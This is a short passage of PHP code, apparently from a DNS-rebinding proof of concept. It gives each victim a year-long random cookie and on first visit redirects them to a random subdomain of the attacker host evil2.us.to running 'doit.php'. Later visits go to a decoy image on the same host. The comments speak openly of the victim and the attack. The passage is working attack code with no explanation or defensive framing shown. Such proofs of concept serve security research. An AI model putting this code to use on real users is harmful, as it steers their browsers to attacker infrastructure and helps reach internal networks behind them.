tag anymore. If it was "touched", every refresh the victim would do on the page with said tag would ruin the attack. */ if(!isset($_COOKIE['rand_hostname'])){ $rnd = rand(); setcookie('rand_hostname', $rnd, time()+31536000); //Expires in a year header("location: http://$rnd.evil2.us.to/poc/rebind/doit.php"); //Redirect to the "doit.php" page }else{ header("location: http://evil2.us.to/poc/rebind/img.jpg"); //Redirect to a real image } ?>